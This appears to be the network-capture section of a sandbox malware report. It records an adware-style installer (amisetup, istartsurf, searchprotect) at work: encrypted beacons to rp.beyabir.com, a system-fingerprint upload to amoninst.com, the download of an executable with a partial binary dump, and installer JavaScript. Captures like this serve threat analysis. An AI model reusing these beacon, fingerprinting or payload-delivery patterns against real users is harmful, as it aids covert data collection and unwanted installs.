X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.42 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 20
15 23:07:38 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.42 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.RegWrite HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.66 ms","message":"store 1 action and 0 upd
ate "}..0..



GET //MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwQSlx3KmUs= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:53 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=122104, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:54:04 GMT
Expires: Sat, 02 May 2015 10:54:04 GMT
ETag: "f8b69e2088ce500f8a2cd23376edbe2b1529a5ce"
Content-Length: 1810
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0....z0x1.0...U....US1.0...U....Ariz
ona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Val
idation Authority - G2..20150430225404Z0..0~0@0... ..........._lkv...8
..f..R34N..@..'..4.0.3..l...,..........K....20150301022209Z.......2015
0430225404Z....20150502105404Z0...*.H.............B......&.e..<.>
;/x......Gj.w..-.w.~#...8[..p.........U.........r....8.-....M....U8.EE
....x&..^.6...c..W.I:.b......t..L...!>.K......=q.@..... ...m.F.Er..
pK.........fB.Y..-..H.....'T%..*.D...Ij..k..................p.i...Q.|!
545........"....~.. .'...T....../s!....0...0...0..........,.z.Hl..0...
*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0.
..U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository
/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000
Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale
1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.
."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=.....
"......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-
N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8
.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.
0B...p..........0...0...U.......0.0...U...........0...U.%..0... ......
... .......0...U.......O........f...e..r..0... .....0......0L..U...E0C
0A.?.=.;hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl0J.
.U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repo
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?daa3db62222adfef HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Content-Length: 969
Date: Thu, 30 Apr 2015 23:11:51 GMT
Connection: keep-alive
0...0...........0...*.H........0..1.0...U....US1.0...U....Arizona1.0..
.U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root C
ertificate Authority - G20...090901000000Z..371231235959Z0..1.0...U...
.US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.
110/..U...(Go Daddy Root Certificate Authority - G20.."0...*.H........
.....0.........qb...Y4.......IX.".... C.;....I.'....N...p..2...>.N.
..O/Y0"...Vk......u.9Q{..5.tN......?........j..............;F|2...f"..
im6.......`.8......F...>.]|.|.. S..biQ%.a.D..,.C.#..:...)....]....0
.9.....K].2..bC%4.V'...;p*?n.....}....Sm`..,.X.._F.....<..I1\iF..G.
[email protected]......:....g(.....An ...
..0...*.H...............]y...Yg.a.~;.1u-. .Oe......../..Z..t.s.8B..{..
u...........S.~.F..... ....'....Z.7....l....=.$Oy.5._.......-.......s@
.r%......h..W...:...D...7...2..8..d.,~........h..".8-z..T.i._3.z={....
_9..u..v.3.,./L.....O...JT...}......~...^....C..M..k...e.z...D.\....HT
TP/1.1 200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified
: Fri, 20 Feb 2015 20:14:50 GMT..Accept-Ranges: bytes..ETag: "05934e14
94dd01:0"..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.NET..X-Powered
-By: ARR/2.5..X-Powered-By: ASP.NET..Content-Length: 969..Date: Thu, 3
0 Apr 2015 23:11:51 GMT..Connection: keep-alive..0...0...........0...*
.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0..
.U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority 
- G20...090901000000Z..371231235959Z0..1.0...U....US1.0...U....Ari
<<< skipped >>>


GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.0.15</center>..</body>..</html>..HTTP/
1.1 301 Moved Permanently..Server: nginx/1.0.15..Date: Thu, 30 Apr 201
5 23:07:42 GMT..Content-Type: text/html..Content-Length: 185..Connecti
on: keep-alive..Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requ
ested-With..Access-Control-Allow-Credentials: true..<html>..<
head><title>301 Moved Permanently</title></head>.
.<body bgcolor="white">..<center><h1>301 Moved Perma
nently</h1></center>..<hr><center>nginx/1.0.15
</center>..</body>..</html>....



POST /?pcrc=236440515&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 864
Cache-Control: no-cache

...3E.Q)_l.y...K8....r.=4p.........OL..6_/r..
.....5.......n(..M.O..E.#.. .X....1...S.A.....A...v.r.o.*.DZ.7.....R..{WxI...].38<..RXG.\].^.. A.. ..(...w.g:.OW..>[.!....m..2.... .....m.........mBdhl)...F"!F_.. .=...]W...r..u......P.l...V..ur...]...3.*.k.j8u.."F..9.3z...L.$*[email protected].)...|... .if/ ..../..5.......6{.
..........(..!...3%"..&ma.)a.E&'...|...Zm.tb.. 
{...0..F..l.*..Ax..>3)..`8!......o..
....:b=%....<...(..I.z..........5.{...A.Y[4*....Eg.h,S.o.
.~B.^8.?.T..vD.P.t"...I...l.D?J......a*.t.uS.p.R...>#......1t..TO.0.b..}... p`...L...1{jq|pZ..i...W....q..$).0...,......U.=.......5Pas....2oj...I..`..>...../9.x.|;..%
.#E....-.Cn...k..2H..8D..TW...].1..M.xD...0.:...:.....b..2...Y..8.xG..L.g hT7.-(.oa<.....Kc...#..8M.2._...Vq]G|#Z........\..........}..e.s...I.[}.... ....0.:..l........L....a.}.%5..0..o..d
.J.....ij..*.'[email protected]........
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 30 Apr 2015 23:07:06 GMT..Server: TornadoServer/4.0.2..Content-Lengt
h: 4..Connection: keep-alive..DONE....


POST /?pcrc=1901405883&v=2.0 HTTP/1.1


Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 1200
Cache-Control: no-cache

.I..~...$$.........n..Z.Z........(.z ..9...L
..a...L8{..sq."?m..vY.U...I.w.....#}[email protected]$.'.
.3. .W3.}....
..i.F.;Dgix.i}..U~...]P{.....-..<..&...&...J.".0I.9.Dtl....1.
.....f..._..EO. .G....G.F..G.L.4U..uL..9..I...s.gj.n.TY........{.u..;..(\.D..q/..4I'..
....J...Vv\.i_...Z......H....3....&s.X;[email protected]../....>........X#x..Z...RmF5u..R.=....3.>....[..a.*{...|..`....g.....)b8.m..jUJ.5.t..D.8...".....`......N.>..{.1]6V......'.U......H...m._...<......:..b.^ju.........
/....wT...L....
`...0.[.y1.....X.g......I....6......(?~?i`[email protected]..;|......O
`[email protected]\_...W..v.5..iV3...R.ku.._.....L.F
....u#..]o.:>-..H...v........>N..|.i0..A<0]BT..B.....g........Y..s.m.....P........s......e.....$.nx.........M~..U,........`.P..:<..Q...U..8...'...
[email protected]\.C..K....D3-l.3a[.....o....zft.Tu5$i3........m.l..S#i^T<....>......... .{G..7<....y....N..E..|..G.e\........2.O'c..
......z...i..?UH....A5y.....O#Q~....%..*T.Z...&....z...:n.KH..-.m.`.%.~...6...f.(u..@.=......?.x"..k......!..h.e(!6;Q........}...*.E.......o.y.C.|..Z.x..k TbJF.
[email protected].].,A....G.Li...G.J.,(.\.) ..o.A.\....n..^..)\.\..(hXq>{..#p...HiZ..H&..../.Z.L.Bcv1.^..:.....1....I}4..~.
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 30 Apr 2015 23:07:06 GMT..Server: TornadoServer/4.0.2..Content-Lengt
h: 4..Connection: keep-alive..DONE....


POST /?pcrc=718955205&v=2.0 HTTP/1.1


Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache

...4.....>.K..~. m].\..1.I...,*R.C.V....E..4A..1....!6..S<.*.W.~j.ofC~"..!.X...^.n.o..5g.]oG46IZ.....Kt.R_nL.....^T.q....R...........c.6h........gA3......,......f...a..>.i..M..[.....m.e..jF.z^..............;^.h....Z.....J....qCn.i.......w...U.T..".:%c.........S.H..}..g.a.A.I.0..%...S0....A3.....
r.....X....
. ....<..U..I....`......m...k.[M.k~ u..W.|.N...y......b[%.a..<8...\..R..{..%._.?....NR.....%.f#.j...b.L....w.F...TaG.....L7.w\..F..3.Ao.*.X7L.yodeh.N......8.8T.L..r....g }..
.[..........ya.....U@/]5.ZI.?..d..*2jQ..s.8U.!...e.<C2. r]`.,&Ix.<..lE....!4...;...o.3.M.....q.G}.Qe.h...J..!...(X.~,.....|..lE..d..J.4R.|..U<w.....Y..=n..H.c2....*.
.gq..{...P%...
(k...
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE....


POST /?pcrc=629602451&v=2.0 HTTP/1.1


Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache

.I..G.)E..,(D-....../3.gA...#A.j..N..-bD$. ..V$. ..21......<a(.>%u...5.L.CV.. ]......../...6{m(W#.#..6...~.{\.!...V._......%...&.%.E.z8H..-.....*..T. ...*..x...rB[...?.CF.......
...........k}./..(.J .....4.
...[..kp..I..N..*....ob1".7.`.8o........IY.@........,..=s
k..R=.)A.....5..~b80......`
.%."S........=|...x...sJJ;..cA*.q.`.........>.....l.
..n..=.{w?.W..ni3.m*.h:..4..*Q-.;.u.....i..7
.....c_....-m...*.W..J.,..}O..X.7$k0.B..>\.9..g....~ub..pbWE...t.9.Md......hC#..L4..e...J...u.Yy.[....M.,..>U....B.`..sZz.Qw#.7.. ..^.4..y.R...d..z..@*.s.3>........r.:1.o...\.^.s.aD.}.............ah.....g.FKmr.[.......!(.p....8*......L..Y.F.............J1.[q.n"0[.... ........
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE....


POST /?pcrc=688063635&v=2.0 HTTP/1.1


Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache

I'.........a.o.~`NH...W.5..............3.A.I.....r..&U(#b..6--5.J'V8V.c....3.P......?.p..G...QqF.......;........PF .xA.3...t....T...j...... .:c. ...J...>W~.c....c....z}2...P.{.g...'.....liA.....\.ez.
~..fz.....V.W.Q.L|..{...2mP....2u..."(N.7.7t...`X
.0...-T8...... [email protected]....{...d.....Td.0c.o..'........-.8.Q.m*...-3\....g/W..#J....~.:Q.<R..{.y.#..~d.f0.\..F...z..V...$a......
B.?.........8u.8Xz...v7.y...W
\......'...<?C .M9{Q..6...k^i.H{Fs#..J.u.k..7.h..yvW..........*H..dy.._.p..p.;.L.@..&.^.ba...e.........V..6 n.w.V.....|c.tYW*
.......x-[...].b.. -xe@d...<..<..)...?Q..98......(.._M7..,.).I..0[.<u...3a>]....H..s:.g.]/...`..B.....RA.I.2.....Q[d.........
..
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 30 Apr 2015 23:07:08 GMT..Server: TornadoServer/4.0.2..Content-Lengt
h: 4..Connection: keep-alive..DONE....


POST /?pcrc=216881437&v=2.0 HTTP/1.1


Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 2352
Cache-Control: no-cache

W..$...1.:.A].PP.E.......FL .........
..P....?...`..u.....p.gE.d{B.S.VB.z...W..1.hU....&.:......4....K.....E....f.Z2d...}..........';[email protected]..^T,.n$T....d.
.i.....QQ..
n9/....c....5.i...M.:$.!. :&.........#/.u.S.^.D#/3..`Y.*. [email protected][email protected].!..S.*)..q:....i..,_#.pp.iER[#.J...__.9......3.....3.q....(.....W.ilN.......6..~./..
|..[yv=p.G.D.y.r.9.8.Go.[4.L;.tp.>|.o.....=.<C..E8../[email protected]`.....5>[H..}.C.fpV..c[...1.......p......z..FY W6...eb.2].7D.X....'.m.!.Gs...{f...l]..........e4o.(l...Z.Y....}..e.c.......
?.//[email protected]
.
.l..i.Da:]........(.O........../..s.".........T^.ux.T........nc(m...E.....U.HL.....|F.s.&.?...*..../.'.v..4...Vm....F..m1..!...%...%...S.P-../[email protected]..% [email protected]%?B.O
.....&..Y.
..l
...9.AF*.W..O..../..O.F.20.k..v.7..|...2.D.U"!{T$...4:Cq ..A.Z.M...e..}^g.......vC...v.........Z.....!.....2u...f.l.......K@......#6L
...s..8.:.a.c.V.........r]M.'..
@.S.....I.....7.I.."...Jh...N.O.U...i...ET......IB..A....
.}[email protected]......(...\.w
....w...A:...p..gfN2,..8/.g4..."..0.m[....Jsb....{.w. ...K....F....:X..c...!.{pI.....b
..y&.p..m...9..r....n..&..IB.$f..N...'..../...v.K......_#.?kY5.X.m..a.)).....}.,..s....M.....w.....<W ...4h.T......pZ....=Y...S.g
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:30 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE....


POST /?pcrc=1431802907&v=2.0 HTTP/1.1


Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 2256
Cache-Control: no-cache

...QzK....i.......$.. ..rg..9.O[..cDU.1P4.~Wl....`[email protected].~...^;.e.>....>A..4....^....^l....)..~........7........t.[..[.....17.........T..\.J..0Z.gB.......z.u..H...}Dc.......'7.>.%..J......V=:7.......z.2..0..........l.......P.o.......[..... .8F...%........Z*...H.`N..c:../....'. ...$..,....s.S.SzX....>..X..@.'...!V......,d....c.>.
...?V...q.P..\.............M.
.y../
U..E......<...5....B..x...=......4_q.u.5..&.f
".9.xF....J_.L.N7.Y.].
.Q..W.}N..ez.2...f_.O..\...v.c.*.....L{{l....{."g.1v.m._.....k.W2|(.|.Y...a5)D..6...;..$..7..-...... ....P..`.F....I.ZS....A`C[...o"..b4.&..h..'t.o .3.6...A.90L.*...N`...5....2...Z.
U#.(d..e.S.z..p.6..9.D.)^5....i...yO.......{.HD.....d.s.{.....~Q.)....D...~..."..[.[(.....|..q...R4..Z..p.......?..'...
[....p..V...f....p ..u........uf.e)H~.d9.m..8......AIkKc...83.yr>......P.
x{..#.j....^f.A$..-.._.hxKxb..P_.........T*.?.)..C..[..6u.)...ml..46:..y..W....K.y.D60.yS *...$..M.&.......=..&..n.hz......&..odA.A"...(9..,..W..C|..3vT.'...3v..n.}....U."..fE.?.c.&..ZE?6t$.z..8(.p..x&N.C...;'.cK..YHob.....CHw...'..*aY....(.....H......".c%"...zD..ko.j&..4
M........
)..}..Kq...K..Q../}p..1.[qM[V.....o:].TB.&_..
.../..>.X.t...}.^F$J..W.9.
1|N%U..k.L.^C..N.r.(.%|B.O....[..i...)S...RO.....,7.-..."]...$.~.l......q#%..s$......`.~..x.x~...mk
u.1..U:............^...*...@.&D.
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:30 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 30 Apr 2015 23:07:30 GMT..Server: TornadoServer/4.0.2..Content-Lengt
h: 4..Connection: keep-alive..DONE..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=489793, public, no-transform, must-revalidate
Last-Modified: Wed, 29 Apr 2015 15:15:07 GMT
Expires: Wed, 6 May 2015 15:15:07 GMT
Date: Thu, 30 Apr 2015 23:12:18 GMT
Connection: keep-alive
0..........0..... .....0......0...0......'.V.8.F.V....H....JW..2015042
9151507Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
.A..2.....:...:......20150429151507Z....20150506151507Z0...*.H........
.....M...2..s..7...........rh.O..2Q........Vn...09..e]..D$.u...r3...x.
...T.#...................3.X.."[email protected]".)=..d.3...SZK...bH.PD..
I..9Js.H).2I.....l^|\.?$_7;E......y...ff...}^9...1....}.....fc..:.....
........T...1;'.o..V.e.=.b*tX[.,..M.H..O7..!.%.A..,...#0...0...0......
....r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....VeriSign
, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at http
s://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing
 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...U....V
eriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use 
at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Class 3 Co
de Signing 2009-2 OCSP Responder0.."0...*.H.............0.............
m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...nz(...V
7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*]...*...
.{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...:.C.Q.
i~rl..<..krS..8.B..o][email protected]
.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.c
om/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by
 reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........
0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...*.H......
<<< skipped >>>


GET /v4/searchprotect/535559167_198339_B48A115F?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2253 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.59 ms","message":"store 2 action and 4 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 201
5 23:07:40 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encod
ing: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-
version: v4..48..{"stats":"ok","time":"1.59 ms","message":"store 2 act
ion and 4 update "}..0..



GET //MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCEMMb3zC402/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:12:18 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=119989, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:17:23 GMT
Expires: Sat, 02 May 2015 10:17:23 GMT
ETag: "c0773ca97a9364f110e8a1925adda329f5e6c722"
Content-Length: 1787
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizo
na1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Vali
dation Authority - G2..20150430221723Z0k0i0A0... ..........._lkv...8..
f..R34N..@..'..4.0.3..l...,....C.o|..M.....20150430221723Z....20150502
101723Z0...*.H.............q.........E.##J.$E,G..0 .......r..)5..L...[
>[email protected]^....K.W'...E.W.=Uws..S.,.....%|.C.....S.3.D.D..L
...*...8...]...m...K;<...L.qr^..!..1...iRo.L...p............l...y[.
..dF...66,s....z..)...!.W..E.f.@.....^M&.G..Sx....a..)u..VIbz...9..h-.
....h.!."....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....U
S1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-
0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secur
e Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U.
...US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0
)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0...
......xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D.
...l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I.
.hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../...
.^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U.
......0.0...U...........0...U.%..0... ......... .......0...U.......O..
......f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy
.com/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000
... ........"hXXp://crl.godaddy.com/repository/0...*.H............
<<< skipped >>>


POST /tdownload.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Host: VVV.lawfuldownload.com

version=1.1.2.41&s1=5844fe1867a9e3700b6c2f6fc517337ccbd4629e&t1=1430435409&campid=9664&prefix=amisetup2899
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup2899__9664.exe"
Content-Type: application/x-msdownload
Date: Thu, 30 Apr 2015 23:07:10 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup2899__9664.exe
Content-Length: 870912
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
..............'.......&.......'...............................".......
..............Rich....................PE..L.....@U.................F..
.................`....2..........................@,...................
..............................P.... .. ;...................`..........
.............................................`..P.....................
.......text....E.......F.................. ..`.rdata..\....`.......J..
............@[email protected][email protected]... ;... 
...<..................@[email protected].......`..."...([email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..j.h.@4.d.....P.P.5.3
[email protected]..].........U..j.hX<4.
d.....PV.P.5.3.P.E.d......u..E.........t.P...............F.....V......
.....M.d......Y^..].............U..j.h(<4.d.....PV.P.5.3.P.E.d.....
.u..E.........t.P...............F......M.d......Y^..]...............@.
...........t.P.f.............F.........U...E...~.%.........]..........
.U..j.h.;4.d.....PQV.P.5.3.P.E.d......u..E.P...E......C....E.........4
..E........M.d......Y^..]..................U..j.h.;4.d.....PQ.P.5.
<<< skipped >>>


POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 333
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.0.30319&OSversion=NT6.1SP1&Slv=&Sysid=915A4028688142931B5DDA64A4540CAD&Sysid1=066389C9740F80692FC30C6511692204&X64=Y&admin=Y&browser=IE.HTTP&cavp=&chver=35.0.1916.153&ci=9664&exe=amisetup2899__9664&ffver=29.0.1.5239&i=MyBestOffersTodayBR&lang_DfltUser=0409&netfs=3&s=Y&ts=1430435233&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:14 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
15d1....      ..      ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
1 Transitional//EN">..<html>..<head>..<meta http-equ
iv="content-type" content="text/html; charset=UTF-8" /> ..<title
>Installer</title>..<base href="hXXp://VVV.amoninst.com:80
/index.php" />..<script type="text/javascript" src="hXXp://cdn1.
lawfuldownload.com/V19/amipb.js"></script>..<script type="
text/javascript">..var g_amiobj = '', g_ami, g_updb = false, g_clos
e = '0', g_additional_offer_list = '0';..var g_finish_install_button =
 '0';..var g_popup_install_all = '0';..var g_eula = ''; ..var g_post1 
= '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c9
07b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageur
l=&_netfs=-31&_vert=3';..var g_icon = '';..var g_comps = [], g_pages =
 [], c, g_curPage = -1;..var g_cid = '9664';..var g_tid = '';..var g_c
c = 'UA';..var g_lang = 'en';..var g_ip = '193.138.244.231';..var g_br
owser = 'ie';..var g_cnt = '3e5a8f2a30ab988ef7a611138130e98a';..var g_
ver = '1.1.2.41';..var g_buttonImage = 1;..var g_thanks = 'thankyou.ph
p';..var g_images = [];..var g_purl = 'hXXp://VVV.amoninst.com:80/pix.
php';..var g_skipCats = 0;..var g_ieVer = '7.0';..var g_chVer = '35.0.
1916.153';..var g_ffVer = '29.0.1.5239';..var g_netfs = -31;..var g_ve
rt  = 3;..var g_os  = "NT6.1SP1";..var g_current_screen = '';..var g_c
ustom_next_button_event = '0';..var g_custom_next_button = '0';..var g
_install_all = 0;....function InitInstall()..{..    g_ami.AddThank
